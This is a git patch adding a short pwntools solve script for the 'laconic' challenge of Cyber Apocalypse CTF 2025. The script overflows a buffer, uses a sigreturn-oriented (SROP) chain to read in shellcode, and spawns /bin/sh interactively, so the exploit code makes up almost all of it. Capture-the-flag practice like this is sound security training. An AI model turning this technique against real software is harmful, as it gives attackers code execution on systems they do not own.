From 2bb59fb08f8531b8fd40019afae93f773c879a71 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Thu, 27 Mar 2025 23:56:51 +0300
Subject: [PATCH] solve script

---
 .../laconic/a.py                              | 42 +++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py

diff --git a/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py b/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
new file mode 100644
index 0000000..ec2ae34
--- /dev/null
+++ b/cyberapocalypse_ctf_2025_tales_from_eldoria/laconic/a.py
@@ -0,0 +1,42 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./laconic", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# gadgets
+pop_rax = 0x43018
+syscall = 0x43015
+
+# sigframe
+frame = SigreturnFrame()
+frame.rax = 0
+frame.rdi = 0
+frame.rsi = 0x43005
+frame.rdx = 0xff
+frame.rip = syscall
+
+# buf
+buf = b"A"*8
+buf += p64(pop_rax)
+buf += p64(0xf)
+buf += p64(syscall)
+buf += bytes(frame)
+
+# shellcode
+sc = """
+lea rdi, [rsi+32]
+xor rsi, rsi
+xor rdx, rdx
+mov al, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+buf += sc
+s(buf)
+
+r.interactive()
\ No newline at end of file